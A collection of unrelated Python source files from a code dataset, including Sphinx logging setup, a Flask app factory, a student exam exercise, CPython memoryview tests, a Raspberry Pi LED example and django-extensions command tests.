# type: () -> None
if hasattr(self.stream, 'flush'):
self.stream.flush()
class LastMessagesWriter(object):
"""Stream writer which memories last 10 messages to save trackback"""
def __init__(self, app, stream):
# type: (Sphinx, IO) -> None
self.app = app
def write(self, data):
# type: (unicode) -> None
self.app.messagelog.append(data)
def setup(app, status, warning):
# type: (Sphinx, IO, IO) -> None
"""Setup root logger for Sphinx"""
logger = logging.getLogger()
logger.setLevel(logging.NOTSET)
# clear all handlers
for handler in logger.handlers[:]:
logger.removeHandler(handler)
info_handler = NewLineStreamHandler(SafeEncodingWriter(status)) # type: ignore
info_handler.addFilter(InfoFilter())
info_handler.setLevel(VERBOSITY_MAP[app.verbosity])
info_handler.setFormatter(ColorizeFormatter())
warning_handler = WarningStreamHandler(SafeEncodingWriter(warning)) # type: ignore
warning_handler.addFilter(WarningSuppressor(app))
warning_handler.addFilter(WarningLogRecordTranslator(app))
warning_handler.addFilter(WarningIsErrorFilter(app))
warning_handler.setLevel(logging.WARNING)
warning_handler.setFormatter(ColorizeFormatter())
messagelog_handler = logging.StreamHandler(LastMessagesWriter(app, status)) # type: ignore
messagelog_handler.addFilter(InfoFilter())
messagelog_handler.setLevel(VERBOSITY_MAP[app.verbosity])
messagelog_handler.setFormatter(ColorizeFormatter())
logger.addHandler(info_handler)
logger.addHandler(warning_handler)
logger.addHandler(messagelog_handler)
|
the-stack_106_19013
|
from flask import Flask
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_cors import CORS
from werkzeug.routing import BaseConverter, ValidationError
from werkzeug.exceptions import BadRequest
db = SQLAlchemy()
migrate = Migrate()
class YearSession:
def __init__(self, year, session):
self.year = year # type:str
self.session = session # type:str
def __repr__(self):
return self.year + self.session
class YearSessionConverter(BaseConverter):
"""Converts yearsessions for flask URLs."""
def to_python(self, value):
"""Called to convert a `value` to its python equivalent.
"""
# Anytime an invalid value is provided, raise ValidationError. Flask
# will catch this, and continue searching the other routes. First,
# check that value is an integer, if not there is no way it could be
# a user.
if len(value) < 5:
raise BadRequest()
year = value[0:4]
session = value[4]
try:
int(year)
except ValueError:
raise BadRequest()
if session not in {'W', 'S'}:
raise BadRequest()
return YearSession(year, session)
def to_url(self, value):
# Convert the yearsession to string
return str(value)
def create_app(config_class=Config):
app = Flask(__name__)
app.config.from_object(config_class)
app.url_map.converters['yearsession'] = YearSessionConverter
db.init_app(app)
migrate.init_app(app, db)
# Main webpage
from app.main import bp as main_bp
app.register_blueprint(main_bp)
# Import API
from app.api import bp as api_bp
app.register_blueprint(api_bp)
CORS(app)
return app, db
from app import models
|
the-stack_106_19014
|
import argparse
import logging
import subprocess
from pathlib import Path
import utils.log as log_utils
if __name__ == "__main__":
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--masks-dir', type=Path, required=True)
parser.add_argument(
'--fbms-dir',
required=True,
type=Path)
parser.add_argument(
'--eval-code-dir',
type=Path,
default='/home/achald/research/misc/datasets/fbms/fgbg-eval-pavel/')
parser.add_argument('--matlab-binary', type=Path, default='matlab')
args = parser.parse_args()
output_log_file = log_utils.add_time_to_path(
args.masks_dir / (Path(__file__).name + '.log'))
log_utils.setup_logging(output_log_file)
for split in ['TrainingSet', 'TestSet']:
try:
command = [
'matlab', '-nodesktop', '-nosplash', '-r',
(f"evaluateAllSeqs('{args.fbms_dir}', '{args.masks_dir}', "
f"{{'{split}'}}); quit")
]
logging.info(f'Command:\n{" ".join(command)}')
output = subprocess.run(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=args.eval_code_dir)
except subprocess.CalledProcessError as e:
logging.fatal('Failed command.\nException: %s\nOutput:\n %s',
e.returncode, e.output.decode('utf-8'))
raise
logging.info(f'{split} accuracy:')
logging.info(output.stdout.decode('utf-8'))
|
the-stack_106_19015
|
"""
Exam 3, problem 5.
Authors: Vibha Alangar, Aaron Wilkin, David Mutchler, Dave Fisher,
Matt Boutell, Amanda Stouder, their colleagues and
Matt Hummel. January 2019.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
import time
import testing_helper
def main():
""" Calls the TEST functions in this module. """
run_test_problem5()
###############################################################################
# DONE: 2. READ the doc-string for the is_prime function defined below.
# It is the same as you have seen before.
# After you UNDERSTAND the doc-string (JUST the doc-string, NOT the code),
# ASKING QUESTIONS AS NEEDED, change the above _TODO_ to DONE.
###############################################################################
def is_prime(n):
"""
What comes in: An integer n.
What goes out:
-- Returns True if the given integer is prime,
False if the given integer is NOT prime.
Treats integers less than 2 as NOT prime.
Side effects: None.
Examples:
-- is_prime(11) returns True
-- is_prime(12) returns False
-- is_prime(2) returns True
-- is_prime(1) returns False
Note: The algorithm used here is simple and clear but slow.
"""
if n < 2:
return False
for k in range(2, (n // 2) + 1):
if n % k == 0:
return False
return True
# ------------------------------------------------------------------
# Students:
# Do NOT touch the above is_prime function - it has no TO DO.
# Do NOT copy code from this function.
#
# Instead, ** CALL ** this function as needed in the problems below.
# ------------------------------------------------------------------
def run_test_problem5():
""" Tests the problem5 function. """
####################################################################
# THESE TESTS ARE ALREADY DONE. DO NOT CHANGE THEM.
####################################################################
print()
print('--------------------------------------------------')
print('Testing the problem5 function:')
print('--------------------------------------------------')
format_string = ' problem5( {} )'
test_results = [0, 0] # Number of tests passed, failed.
# Test 1:
sequence = [[1,3,2], [10, 5], []]
expected = [3, 10]
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# Test 2:
sequence = [[10, 12], (23, 1)]
expected = [12, 23]
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# Test 3:
sequence = [(4, 25),
(33, 54, 20, 55, 10),
(6, 11, 70, 33),
(7, 11),
(),
(5, 5, 3)
]
expected = [25, 55, 70, 11, 5]
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# Test 4:
sequence = ([1], [], [2, 5])
expected = [1, 5]
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# Test 5:
sequence = ([], [], [])
expected = []
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# SUMMARY of the test results:
print_summary_of_test_results(test_results)
def problem5(seq_of_seq):
"""
What comes in:
-- A sequence of sub-sequences of integers.
What goes out:
-- Returns a NEW list containing largest integer of each sequence.
If one of the original sub-sequences were empty, it has no largest number,
so contributes no integer to the returned list.
Side effects: None.
Examples:
problem5([(4, 25),
(33, 54, 20, 55, 10),
(6, 11, 70, 33),
(7, 11),
(),
(5, 5, 3)
])
returns [25, 55, 70, 11, 5]
problem5( [[10, 12], (23, 1)] ) returns [12, 23]
problem5( ([1], [], [2, 5] ) ) returns [1, 2]
problem5( [[], [], [] ) returns []
problem5( [1,3,2], [10, 5], []]) returns [3,10]
Type hints:
:type seq_of_seq: list of list of int
:rtype: (list of int) | int
"""
# -------------------------------------------------------------------------
# DONE: 2. Implement and test this function.
# Tests have been written for you (above).
# -------------------------------------------------------------------------
nlist = []
for k in range(len(seq_of_seq)):
maxj = 0
for j in range(len(seq_of_seq[k])):
if(seq_of_seq[k][j]>seq_of_seq[k][maxj]):
maxj = j
if(len(seq_of_seq[k])>0):
nlist += [seq_of_seq[k][maxj]]
return nlist
###############################################################################
# Our tests use the following to print error messages in red.
# Do NOT change it. You do NOT have to do anything with it.
###############################################################################
def print_expected_result_of_test(arguments, expected,
test_results, format_string):
testing_helper.print_expected_result_of_test(arguments, expected,
test_results,
format_string)
def print_actual_result_of_test(expected, actual, test_results):
testing_helper.print_actual_result_of_test(expected, actual,
test_results)
def print_summary_of_test_results(test_results):
testing_helper.print_summary_of_test_results(test_results)
# To allow color-coding the output to the console:
USE_COLORING = True # Change to False to revert to OLD style coloring
testing_helper.USE_COLORING = USE_COLORING
if USE_COLORING:
# noinspection PyShadowingBuiltins
print = testing_helper.print_colored
else:
# noinspection PyShadowingBuiltins
print = testing_helper.print_uncolored
# -----------------------------------------------------------------------------
# Calls main to start the ball rolling.
# The try .. except prevents error messages on the console from being
# intermingled with ordinary output to the console.
# -----------------------------------------------------------------------------
try:
main()
except Exception:
print('ERROR - While running this test,', color='red')
print('your code raised the following exception:', color='red')
print()
time.sleep(1)
raise
|
the-stack_106_19017
|
from django.shortcuts import render, redirect
from django.contrib import messages
from django.core.mail import send_mail
from .models import Contact
def contact(request):
if request.method == 'POST':
listing_id = request.POST['listing_id']
listing = request.POST['listing']
name = request.POST['name']
email = request.POST['email']
phone = request.POST['phone']
message = request.POST['message']
user_id = request.POST['user_id']
realtor_email = request.POST['realtor_email']
# Check if user has made inquiry already
if request.user.is_authenticated:
user_id = request.user.id
has_contacted = Contact.object.all().filter(listing_id=listing_id, user_id=user_id)
if has_contacted:
messages.error(request, 'You have already made an inquiry for this listing')
return redirect('/listings/'+listing_id)
contact = Contact(listing=listing, listing_id=listing_id, name=name, email=email, phone=phone, message=message, user_id=user_id)
contact.save()
# Send Mail
send_mail(
'Property Listing Inquiry',
'There has been an inquiry for ' + listing + '. Sign into the panel for more info.',
'[email protected]',
[realtor_email],
fail_silently=False
)
messages.success(request, 'Your request has been submitted, a realtor will get back to you soon')
return redirect('/listings/'+listing_id)
|
the-stack_106_19018
|
"""Unit tests for the memoryview
Some tests are in test_bytes. Many tests that require _testbuffer.ndarray
are in test_buffer.
"""
import unittest
import test.support
import sys
import gc
import weakref
import array
import io
import copy
import pickle
from test.support import check_impl_detail
try:
getrefcount = sys.getrefcount
except AttributeError:
# PyPy
getrefcount = lambda o: len(gc.get_referents(o))
class AbstractMemoryTests:
source_bytes = b"abcdef"
@property
def _source(self):
return self.source_bytes
@property
def _types(self):
return filter(None, [self.ro_type, self.rw_type])
def check_getitem_with_type(self, tp):
b = tp(self._source)
oldrefcount = getrefcount(b)
m = self._view(b)
self.assertEqual(m[0], ord(b"a"))
self.assertIsInstance(m[0], int)
self.assertEqual(m[5], ord(b"f"))
self.assertEqual(m[-1], ord(b"f"))
self.assertEqual(m[-6], ord(b"a"))
# Bounds checking
self.assertRaises(IndexError, lambda: m[6])
self.assertRaises(IndexError, lambda: m[-7])
self.assertRaises(IndexError, lambda: m[sys.maxsize])
self.assertRaises(IndexError, lambda: m[-sys.maxsize])
# Type checking
self.assertRaises(TypeError, lambda: m[None])
self.assertRaises(TypeError, lambda: m[0.0])
self.assertRaises(TypeError, lambda: m["a"])
m = None
self.assertEqual(getrefcount(b), oldrefcount)
def test_getitem(self):
for tp in self._types:
self.check_getitem_with_type(tp)
def test_iter(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
self.assertEqual(list(m), [m[i] for i in range(len(m))])
def test_setitem_readonly(self):
if not self.ro_type:
self.skipTest("no read-only type to test")
b = self.ro_type(self._source)
oldrefcount = getrefcount(b)
m = self._view(b)
def setitem(value):
m[0] = value
self.assertRaises(TypeError, setitem, b"a")
self.assertRaises(TypeError, setitem, 65)
self.assertRaises(TypeError, setitem, memoryview(b"a"))
m = None
self.assertEqual(getrefcount(b), oldrefcount)
def test_setitem_writable(self):
if not self.rw_type:
self.skipTest("no writable type to test")
tp = self.rw_type
b = self.rw_type(self._source)
oldrefcount = getrefcount(b)
m = self._view(b)
m[0] = ord(b'1')
self._check_contents(tp, b, b"1bcdef")
m[0:1] = tp(b"0")
self._check_contents(tp, b, b"0bcdef")
m[1:3] = tp(b"12")
self._check_contents(tp, b, b"012def")
m[1:1] = tp(b"")
self._check_contents(tp, b, b"012def")
m[:] = tp(b"abcdef")
self._check_contents(tp, b, b"abcdef")
# Overlapping copies of a view into itself
m[0:3] = m[2:5]
self._check_contents(tp, b, b"cdedef")
m[:] = tp(b"abcdef")
m[2:5] = m[0:3]
self._check_contents(tp, b, b"ababcf")
def setitem(key, value):
m[key] = tp(value)
# Bounds checking
self.assertRaises(IndexError, setitem, 6, b"a")
self.assertRaises(IndexError, setitem, -7, b"a")
self.assertRaises(IndexError, setitem, sys.maxsize, b"a")
self.assertRaises(IndexError, setitem, -sys.maxsize, b"a")
# Wrong index/slice types
self.assertRaises(TypeError, setitem, 0.0, b"a")
if check_impl_detail():
self.assertRaises(TypeError, setitem, (0,), b"a")
self.assertRaises(TypeError, setitem, (slice(0,1,1), 0), b"a")
self.assertRaises(TypeError, setitem, (0, slice(0,1,1)), b"a")
self.assertRaises(TypeError, setitem, (0,), b"a")
self.assertRaises(TypeError, setitem, "a", b"a")
# Not implemented: multidimensional slices
slices = (slice(0,1,1), slice(0,1,2))
self.assertRaises(NotImplementedError, setitem, slices, b"a")
# Trying to resize the memory object
exc = ValueError if m.format == 'c' else TypeError
self.assertRaises(exc, setitem, 0, b"")
self.assertRaises(exc, setitem, 0, b"ab")
self.assertRaises(ValueError, setitem, slice(1,1), b"a")
self.assertRaises(ValueError, setitem, slice(0,2), b"a")
m = None
self.assertEqual(getrefcount(b), oldrefcount)
def test_delitem(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
with self.assertRaises(TypeError):
del m[1]
with self.assertRaises(TypeError):
del m[1:4]
def test_tobytes(self):
for tp in self._types:
m = self._view(tp(self._source))
b = m.tobytes()
# This calls self.getitem_type() on each separate byte of b"abcdef"
expected = b"".join(
self.getitem_type(bytes([c])) for c in b"abcdef")
self.assertEqual(b, expected)
self.assertIsInstance(b, bytes)
def test_tolist(self):
for tp in self._types:
m = self._view(tp(self._source))
l = m.tolist()
self.assertEqual(l, list(b"abcdef"))
def test_compare(self):
# memoryviews can compare for equality with other objects
# having the buffer interface.
for tp in self._types:
m = self._view(tp(self._source))
for tp_comp in self._types:
self.assertTrue(m == tp_comp(b"abcdef"))
self.assertFalse(m != tp_comp(b"abcdef"))
self.assertFalse(m == tp_comp(b"abcde"))
self.assertTrue(m != tp_comp(b"abcde"))
self.assertFalse(m == tp_comp(b"abcde1"))
self.assertTrue(m != tp_comp(b"abcde1"))
self.assertTrue(m == m)
self.assertTrue(m == m[:])
self.assertTrue(m[0:6] == m[:])
self.assertFalse(m[0:5] == m)
# Comparison with objects which don't support the buffer API
self.assertFalse(m == "abcdef")
self.assertTrue(m != "abcdef")
self.assertFalse("abcdef" == m)
self.assertTrue("abcdef" != m)
# Unordered comparisons
for c in (m, b"abcdef"):
self.assertRaises(TypeError, lambda: m < c)
self.assertRaises(TypeError, lambda: c <= m)
self.assertRaises(TypeError, lambda: m >= c)
self.assertRaises(TypeError, lambda: c > m)
def check_attributes_with_type(self, tp):
m = self._view(tp(self._source))
self.assertEqual(m.format, self.format)
self.assertEqual(m.itemsize, self.itemsize)
self.assertEqual(m.ndim, 1)
self.assertEqual(m.shape, (6,))
self.assertEqual(len(m), 6)
self.assertEqual(m.strides, (self.itemsize,))
self.assertEqual(m.suboffsets, ())
return m
def test_attributes_readonly(self):
if not self.ro_type:
self.skipTest("no read-only type to test")
m = self.check_attributes_with_type(self.ro_type)
self.assertEqual(m.readonly, True)
def test_attributes_writable(self):
if not self.rw_type:
self.skipTest("no writable type to test")
m = self.check_attributes_with_type(self.rw_type)
self.assertEqual(m.readonly, False)
def test_getbuffer(self):
# Test PyObject_GetBuffer() on a memoryview object.
for tp in self._types:
b = tp(self._source)
oldrefcount = getrefcount(b)
m = self._view(b)
oldviewrefcount = getrefcount(m)
s = str(m, "utf-8")
self._check_contents(tp, b, s.encode("utf-8"))
self.assertEqual(getrefcount(m), oldviewrefcount)
m = None
self.assertEqual(getrefcount(b), oldrefcount)
def test_gc(self):
for tp in self._types:
if not isinstance(tp, type):
# If tp is a factory rather than a plain type, skip
continue
class MyView():
def __init__(self, base):
self.m = memoryview(base)
class MySource(tp):
pass
class MyObject:
pass
# Create a reference cycle through a memoryview object.
# This exercises mbuf_clear().
b = MySource(tp(b'abc'))
m = self._view(b)
o = MyObject()
b.m = m
b.o = o
wr = weakref.ref(o)
b = m = o = None
# The cycle must be broken
gc.collect()
self.assertTrue(wr() is None, wr())
# This exercises memory_clear().
m = MyView(tp(b'abc'))
o = MyObject()
m.x = m
m.o = o
wr = weakref.ref(o)
m = o = None
# The cycle must be broken
gc.collect()
self.assertTrue(wr() is None, wr())
def _check_released(self, m, tp):
check = self.assertRaisesRegex(ValueError, "released")
with check: bytes(m)
with check: m.tobytes()
with check: m.tolist()
with check: m[0]
with check: m[0] = b'x'
with check: len(m)
with check: m.format
with check: m.itemsize
with check: m.ndim
with check: m.readonly
with check: m.shape
with check: m.strides
with check:
with m:
pass
# str() and repr() still function
self.assertIn("released memory", str(m))
self.assertIn("released memory", repr(m))
self.assertEqual(m, m)
self.assertNotEqual(m, memoryview(tp(self._source)))
self.assertNotEqual(m, tp(self._source))
def test_contextmanager(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
with m as cm:
self.assertIs(cm, m)
self._check_released(m, tp)
m = self._view(b)
# Can release explicitly inside the context manager
with m:
m.release()
def test_release(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
m.release()
self._check_released(m, tp)
# Can be called a second time (it's a no-op)
m.release()
self._check_released(m, tp)
def test_writable_readonly(self):
# Issue #10451: memoryview incorrectly exposes a readonly
# buffer as writable causing a segfault if using mmap
tp = self.ro_type
if tp is None:
self.skipTest("no read-only type to test")
b = tp(self._source)
m = self._view(b)
i = io.BytesIO(b'ZZZZ')
self.assertRaises(TypeError, i.readinto, m)
def test_getbuf_fail(self):
self.assertRaises(TypeError, self._view, {})
def test_hash(self):
# Memoryviews of readonly (hashable) types are hashable, and they
# hash as hash(obj.tobytes()).
tp = self.ro_type
if tp is None:
self.skipTest("no read-only type to test")
b = tp(self._source)
m = self._view(b)
self.assertEqual(hash(m), hash(b"abcdef"))
# Releasing the memoryview keeps the stored hash value (as with weakrefs)
m.release()
self.assertEqual(hash(m), hash(b"abcdef"))
# Hashing a memoryview for the first time after it is released
# results in an error (as with weakrefs).
m = self._view(b)
m.release()
self.assertRaises(ValueError, hash, m)
def test_hash_writable(self):
# Memoryviews of writable types are unhashable
tp = self.rw_type
if tp is None:
self.skipTest("no writable type to test")
b = tp(self._source)
m = self._view(b)
self.assertRaises(ValueError, hash, m)
def test_weakref(self):
# Check memoryviews are weakrefable
for tp in self._types:
b = tp(self._source)
m = self._view(b)
L = []
def callback(wr, b=b):
L.append(b)
wr = weakref.ref(m, callback)
self.assertIs(wr(), m)
del m
test.support.gc_collect()
self.assertIs(wr(), None)
self.assertIs(L[0], b)
def test_reversed(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
aslist = list(reversed(m.tolist()))
self.assertEqual(list(reversed(m)), aslist)
self.assertEqual(list(reversed(m)), list(m[::-1]))
def test_toreadonly(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
mm = m.toreadonly()
self.assertTrue(mm.readonly)
self.assertTrue(memoryview(mm).readonly)
self.assertEqual(mm.tolist(), m.tolist())
mm.release()
m.tolist()
def test_issue22668(self):
a = array.array('H', [256, 256, 256, 256])
x = memoryview(a)
m = x.cast('B')
b = m.cast('H')
c = b[0:2]
d = memoryview(b)
del b
self.assertEqual(c[0], 256)
self.assertEqual(d[0], 256)
self.assertEqual(c.format, "H")
self.assertEqual(d.format, "H")
_ = m.cast('I')
self.assertEqual(c[0], 256)
self.assertEqual(d[0], 256)
self.assertEqual(c.format, "H")
self.assertEqual(d.format, "H")
# Variations on source objects for the buffer: bytes-like objects, then arrays
# with itemsize > 1.
# NOTE: support for multi-dimensional objects is unimplemented.
class BaseBytesMemoryTests(AbstractMemoryTests):
ro_type = bytes
rw_type = bytearray
getitem_type = bytes
itemsize = 1
format = 'B'
class BaseArrayMemoryTests(AbstractMemoryTests):
ro_type = None
rw_type = lambda self, b: array.array('i', list(b))
getitem_type = lambda self, b: array.array('i', list(b)).tobytes()
itemsize = array.array('i').itemsize
format = 'i'
@unittest.skip('XXX test should be adapted for non-byte buffers')
def test_getbuffer(self):
pass
@unittest.skip('XXX NotImplementedError: tolist() only supports byte views')
def test_tolist(self):
pass
# Variations on indirection levels: memoryview, slice of memoryview,
# slice of slice of memoryview.
# This is important to test allocation subtleties.
class BaseMemoryviewTests:
def _view(self, obj):
return memoryview(obj)
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj, tp(contents))
class BaseMemorySliceTests:
source_bytes = b"XabcdefY"
def _view(self, obj):
m = memoryview(obj)
return m[1:7]
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj[1:7], tp(contents))
def test_refs(self):
for tp in self._types:
m = memoryview(tp(self._source))
oldrefcount = getrefcount(m)
m[1:2]
self.assertEqual(getrefcount(m), oldrefcount)
class BaseMemorySliceSliceTests:
source_bytes = b"XabcdefY"
def _view(self, obj):
m = memoryview(obj)
return m[:7][1:]
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj[1:7], tp(contents))
# Concrete test classes
class BytesMemoryviewTest(unittest.TestCase,
BaseMemoryviewTests, BaseBytesMemoryTests):
def test_constructor(self):
for tp in self._types:
ob = tp(self._source)
self.assertTrue(memoryview(ob))
self.assertTrue(memoryview(object=ob))
self.assertRaises(TypeError, memoryview)
self.assertRaises(TypeError, memoryview, ob, ob)
self.assertRaises(TypeError, memoryview, argument=ob)
self.assertRaises(TypeError, memoryview, ob, argument=True)
class ArrayMemoryviewTest(unittest.TestCase,
BaseMemoryviewTests, BaseArrayMemoryTests):
def test_array_assign(self):
# Issue #4569: segfault when mutating a memoryview with itemsize != 1
a = array.array('i', range(10))
m = memoryview(a)
new_a = array.array('i', range(9, -1, -1))
m[:] = new_a
self.assertEqual(a, new_a)
class BytesMemorySliceTest(unittest.TestCase,
BaseMemorySliceTests, BaseBytesMemoryTests):
pass
class ArrayMemorySliceTest(unittest.TestCase,
BaseMemorySliceTests, BaseArrayMemoryTests):
pass
class BytesMemorySliceSliceTest(unittest.TestCase,
BaseMemorySliceSliceTests, BaseBytesMemoryTests):
pass
class ArrayMemorySliceSliceTest(unittest.TestCase,
BaseMemorySliceSliceTests, BaseArrayMemoryTests):
pass
class OtherTest(unittest.TestCase):
def test_ctypes_cast(self):
# Issue 15944: Allow all source formats when casting to bytes.
ctypes = test.support.import_module("ctypes")
p6 = bytes(ctypes.c_double(0.6))
d = ctypes.c_double()
m = memoryview(d).cast("B")
m[:2] = p6[:2]
m[2:] = p6[2:]
self.assertEqual(d.value, 0.6)
for format in "Bbc":
with self.subTest(format):
d = ctypes.c_double()
m = memoryview(d).cast(format)
m[:2] = memoryview(p6).cast(format)[:2]
m[2:] = memoryview(p6).cast(format)[2:]
self.assertEqual(d.value, 0.6)
def test_memoryview_hex(self):
# Issue #9951: memoryview.hex() segfaults with non-contiguous buffers.
x = b'0' * 200000
m1 = memoryview(x)
m2 = m1[::-1]
self.assertEqual(m2.hex(), '30' * 200000)
def test_copy(self):
m = memoryview(b'abc')
with self.assertRaises(TypeError):
copy.copy(m)
def test_pickle(self):
m = memoryview(b'abc')
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(m, proto)
if __name__ == "__main__":
unittest.main()
|
the-stack_106_19019
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._metric_baseline_operations import MetricBaselineOperations
__all__ = [
'MetricBaselineOperations',
]
|
the-stack_106_19020
|
import time
from rpi.gpio import setup, cleanup, CkPin
from rpi.gpio.controls import TwoPoleButton
from rpi.gpio.lights import LedBar
def main():
"""
This example switches the LEDs within the LED bar in a flowing manner, and it does this once each time a button is
pressed. It runs with the circuit described on page 72 of the tutorial, with the addition of a button circuit like
the one shown on page 59.
"""
setup()
led_bar = LedBar(
output_pins=[
CkPin.GPIO17,
CkPin.GPIO18,
CkPin.GPIO27,
CkPin.GPIO22,
CkPin.GPIO23,
CkPin.GPIO24,
CkPin.GPIO25,
CkPin.SDA1,
CkPin.SCL1,
CkPin.CE0
],
reverse=True
)
button = TwoPoleButton(input_pin=CkPin.GPIO12, bounce_time_ms=50)
button.event(lambda s: led_bar.flow(0.03) if s.pressed else None)
print('You have 20 seconds to press the button...')
time.sleep(20)
cleanup()
if __name__ == '__main__':
main()
|
the-stack_106_19021
|
import numpy as np
import tensorflow as tf
from models.generator import SNGANGenerator
class SNGANGeneratorTest(tf.test.TestCase):
def testInit(self):
SNGANGenerator()
def testBuildAndRun(self):
N = 5
z_size = 10
z = tf.initializers.random_normal()((N, z_size))
sng = SNGANGenerator(category=5)
y = [[0]] * N
outputs = sng(z, labels=y)
o_H = sng._bottom_w * (2 ** 5)
self.assertEqual((N, o_H, o_H, 3), outputs.shape)
def testTrain(self):
N = 5
z_size = 10
z = tf.initializers.random_normal()((N, z_size))
sng = SNGANGenerator(category=5)
y = [[0]] * N
with tf.GradientTape() as tape:
outputs = sng(z, labels=y)
loss = tf.reduce_mean(tf.square(1 - outputs))
grads = tape.gradient(loss, sng.variables)
optimizer = tf.train.GradientDescentOptimizer(0.001)
optimizer.apply_gradients(zip(grads, sng.variables))
|
the-stack_106_19022
|
# -*- coding: utf-8 -*-
import mock
import os
import sys
import shutil
import logging
import importlib
import django
from django.core.management import call_command, find_commands, load_command_class
from django.test import TestCase
from django.utils.six import StringIO, PY3
from django_extensions.management.modelviz import use_model, generate_graph_data
from django_extensions.management.commands.merge_model_instances import \
get_model_to_deduplicate, \
get_field_names, \
keep_first_or_last_instance
from . import force_color_support
from .testapp.models import Person, Name, Note, Personality, Club, Membership, \
Permission
from .testapp.jobs.hourly.test_hourly_job import HOURLY_JOB_MOCK
from .testapp.jobs.daily.test_daily_job import DAILY_JOB_MOCK
from .testapp.jobs.weekly.test_weekly_job import WEEKLY_JOB_MOCK
from .testapp.jobs.monthly.test_monthly_job import MONTHLY_JOB_MOCK
from .testapp.jobs.yearly.test_yearly_job import YEARLY_JOB_MOCK
class MockLoggingHandler(logging.Handler):
""" Mock logging handler to check for expected logs. """
def __init__(self, *args, **kwargs):
self.reset()
logging.Handler.__init__(self, *args, **kwargs)
def emit(self, record):
self.messages[record.levelname.lower()].append(record.getMessage())
def reset(self):
self.messages = {
'debug': [],
'info': [],
'warning': [],
'error': [],
'critical': [],
}
class CommandTest(TestCase):
def test_error_logging(self):
# Ensure command errors are properly logged and reraised
from django_extensions.management.base import logger
logger.addHandler(MockLoggingHandler())
module_path = "tests.management.commands.error_raising_command"
module = importlib.import_module(module_path)
error_raising_command = module.Command()
self.assertRaises(Exception, error_raising_command.execute)
handler = logger.handlers[0]
self.assertEqual(len(handler.messages['error']), 1)
class ShowTemplateTagsTests(TestCase):
def test_some_output(self):
out = StringIO()
call_command('show_template_tags', stdout=out)
output = out.getvalue()
# Once django_extension is installed during tests it should appear with
# its templatetags
self.assertIn('django_extensions', output)
# let's check at least one
self.assertIn('truncate_letters', output)
class CreateAppTests(TestCase):
def test_command(self):
if django.VERSION[:2] >= (1, 10):
return
tmpname = "testapptest"
# TODO better temp dir handling
tmpdir = "/tmp"
tmppath = os.path.join(tmpdir, tmpname)
self.assertFalse(os.path.isdir(tmppath))
out = StringIO()
try:
call_command('create_app', tmpname, parent_path=tmpdir, stdout=out)
finally:
if os.path.isdir(tmppath):
shutil.rmtree(tmppath)
output = out.getvalue()
self.assertIn("Application '%s' created." % tmpname, output)
class AdminGeneratorTests(TestCase):
def test_command(self):
out = StringIO()
call_command('admin_generator', 'django_extensions', stdout=out)
output = out.getvalue()
self.assertIn("@admin.register(Secret)", output)
self.assertIn("class SecretAdmin(admin.ModelAdmin):", output)
if PY3:
self.assertIn("list_display = ('id', 'name', 'text')", output)
self.assertIn("search_fields = ('name',)", output)
else:
self.assertIn("list_display = (u'id', u'name', u'text')", output)
self.assertIn("search_fields = (u'name',)", output)
class DescribeFormTests(TestCase):
def test_command(self):
out = StringIO()
call_command('describe_form', 'django_extensions.Secret', stdout=out)
output = out.getvalue()
self.assertIn("class SecretForm(forms.Form):", output)
self.assertRegexpMatches(output, "name = forms.CharField\(.*max_length=255")
self.assertRegexpMatches(output, "name = forms.CharField\(.*required=False")
self.assertRegexpMatches(output, "name = forms.CharField\(.*label=u?'Name'")
self.assertRegexpMatches(output, "text = forms.CharField\(.*required=False")
self.assertRegexpMatches(output, "text = forms.CharField\(.*label=u?'Text'")
class UpdatePermissionsTests(TestCase):
def test_works(self):
from django.db import models
class PermModel(models.Model):
class Meta:
app_label = 'django_extensions'
permissions = (('test_permission', 'test_permission'),)
original_stdout = sys.stdout
out = sys.stdout = StringIO()
call_command('update_permissions', stdout=out, verbosity=3)
sys.stdout = original_stdout
self.assertIn("Can change perm model", out.getvalue())
class CommandSignalTests(TestCase):
pre = None
post = None
def test_works(self):
from django_extensions.management.signals import post_command, \
pre_command
from django_extensions.management.commands.show_template_tags import \
Command
def pre(sender, **kwargs):
CommandSignalTests.pre = dict(**kwargs)
def post(sender, **kwargs):
CommandSignalTests.post = dict(**kwargs)
pre_command.connect(pre, Command)
post_command.connect(post, Command)
out = StringIO()
call_command('show_template_tags', stdout=out)
self.assertIn('args', CommandSignalTests.pre)
self.assertIn('kwargs', CommandSignalTests.pre)
self.assertIn('args', CommandSignalTests.post)
self.assertIn('kwargs', CommandSignalTests.post)
self.assertIn('outcome', CommandSignalTests.post)
class CommandClassTests(TestCase):
def setUp(self):
management_dir = os.path.join('django_extensions', 'management')
